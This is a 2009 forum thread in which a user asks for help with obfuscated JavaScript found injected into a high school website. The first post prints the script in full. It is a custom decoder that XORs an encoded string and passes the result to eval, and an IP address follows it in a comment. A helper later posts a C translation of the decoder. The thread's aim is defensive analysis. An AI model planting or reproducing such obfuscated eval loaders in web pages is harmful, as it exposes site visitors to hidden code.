Help me figure this out please!!

Newbie Member
12Mar2009,00:43   #1
ed5480's Avatar
I found this on my website and i dont know what it does or how it got there. If anyone can help me try and figure this thing out please let me know.
Code:
<script language=JavaScript>

function rmban(x)
{var l=x.length,
b=1024,
i,j,r,
p=0,s=0,w=0,
t=Array& #40;63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5
 6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,
12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61);

for(j=Math.ceil(l/b);j>0;j--)
{r='';
for(i=Math.min(l,b);i>0;i--,l--)
{{w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(149^w&255);
w>>=8;s-=2}
else{s=6}
}
}
eval(r);
}
}
rmban(& #39;yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkU
 TYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJ
 cw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0r
GGq')
</script>
<!-- 205.178.132.155 -->
Mentor
12Mar2009,04:08   #2
xpi0t0s's Avatar
Well it could do absolutely anything. It's clear it's been severely obfuscated.
So if you delete it on the grounds that it must have been obfuscated for a reason, and that probably wasn't a good reason since whoever put it there did so without your knowledge, I would suggest just deleting it. If it reappears raise it with your ISP, maybe it's some advertising junk, especially if you've got a "free" (i.e. advert supported) hosting provider. Or maybe there's some lack of security on their part that they would want to know about, since it appears people can add what looks like potentially malicious code to any of their customers' websites.

"potentially malicious" because it's obfuscated and uncommented. If it were there for valid reasons it wouldn't be at least one of those.
Newbie Member
12Mar2009,04:23   #3
ed5480's Avatar
the website belongs to my high school. its our schools website and no one on the team that works on it knows javascript. the site is not hosted on a free server or anything like that. we want to know what it does. based on the research ive done it seems like it may be encoding or decoding a php string to run on our server but we could be completely wrong. If anyone knows what this does PLEASE let us know. It has been removed from the site but we would like to figure out what it does and hopefully that will help us figure out where it came from and possibly why its there. Thanks
Mentor
13Mar2009,04:22   #4
xpi0t0s's Avatar
I can't figure out what it does. I've converted it to C and I think I've got it right but it just produces junk. There could be some nuance of Javascript I'm not aware of that means I've got the conversion wrong, which isn't unlikely as I'm not a Javascript expert, but I've tried a few things and nothing produces anything that looks meaningful.
Note that the Go4Expert parser will most likely add spaces to the long strings, as I think it has done with your original post. In this there are no spaces in x or t.
Also I've tweaked some of the code based on the actual length of x, e.g. as it's less than b, ceil(l/b) will be 1.
Code:
	char *x="yI02SkPLxf8LcWOLvVrJek02XqkkSkPz9Vw5xW2pyBO0h@BPGv70IBOzL@Blxmw2XV7zV_wkICkUTYwr6FBLhC2kRrq3y6w5XT0pRBp5Rnppr7kPomBLzPxUR@22S6qFcW80x8OzxWP2L6qP0_f3VF735RkJcw7zJOPJ27xlK7O0SW803nf39dY0XIP5zWOrvfflvWOxU@wr6nw0vC82cI2kxk02XBxrgrq0IBOzL@0rGGq";
	int t[]={63,25,62,40,29,60,55,10,30,32,0,0,0,0,0,0,3,0,31,23,16,36,54,50,8,51,44,53,5,6,21,28,14,47,4,58,49,39,57,35,7,48,27,13,0,0,0,0,18,0,5,2,52,22,17,26,41,33,20,12,43,45,19,6,24,46,11,42,9,1,37,38,15,59,34,61};
	int l=(int)strlen(x);
	int b=1024,i,j;
	int w=0,s=0,p=0;
	for (j=1/*ceil(l/b)*/; j>0; j--)
	{
		char r[1024];
		int rptr=0;
		r[rptr]=0;
		for (i=l; i>0; i--)
		{
			w|=(t[(x[p++]-48)])<<s;
			if(s)
			{
				r[rptr++]=char(149^w&255);
				r[rptr]=0;
				w>>=8;
				s-=2;
			}
			else{s=6;}
		}
		printf("eval('%s')\n",r);
	}